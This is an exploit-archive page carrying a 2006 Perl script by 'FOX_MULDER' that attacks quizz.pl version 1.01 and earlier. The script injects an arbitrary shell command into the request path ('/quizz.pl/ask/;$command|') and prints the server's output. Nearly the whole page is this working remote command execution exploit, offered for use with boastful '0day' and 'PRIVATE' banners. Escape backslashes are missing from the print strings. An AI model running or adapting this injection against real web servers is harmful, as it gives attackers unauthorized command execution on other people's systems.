[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : quizz <= 1.01 (quizz.pl) Remote Command Execution Exploit
# Published : 2006-04-13
# Author : FOX_MULDER
# Previous Title : Censtore <= 7.3.x (censtore.cgi) Remote Command Execution Exploit
# Next Title : PAJAX <= 0.5.1 Remote Code Execution Exploit
#!/usr/bin/perl
#
# quizz.p exploit by FOX_MULDER (fox_mulder@abv.bg)
#
# Vulnerability foud by WBYTE.
#
# Born to be root !!!
#
# !!!!!!!!!!!!!!!THANKS to WBYTE !!!!!!!!!!!!!!!!!
#
# FACT:Wbyte doesn't sleeps , he waits !.
# 0day
####################################################################################
use IO::Socket;
use LWP::Simple;
sub Usage {
print STDERR "nFOX_MULDER DID IT AGAIN !!!n";
print STDERR "Usage:nquiz.pl <www.example.com> </path/> "cmd"n";
exit;
}
if (@ARGV < 3)
{
Usage();
}
$host = @ARGV[0];
$path = @ARGV[1];
$command = @ARGV[2];
print "nn !!! PRIVATE PRIVATE PRIVATE !!! nn";
print "quizz.pl 0day Remote Command Execution Exploit by FOX_MULDERn";
print "n[+] Conecting to $hostn";
print "n[+] Injecting command . . .nn";
my $result = get("http://$host$path/quizz.pl/ask/;$command|");
if (defined $result) {
print "fox@nasa# $result";
}
else {
print "Error with request.n";
}
# www.Syue.com [2006-04-13]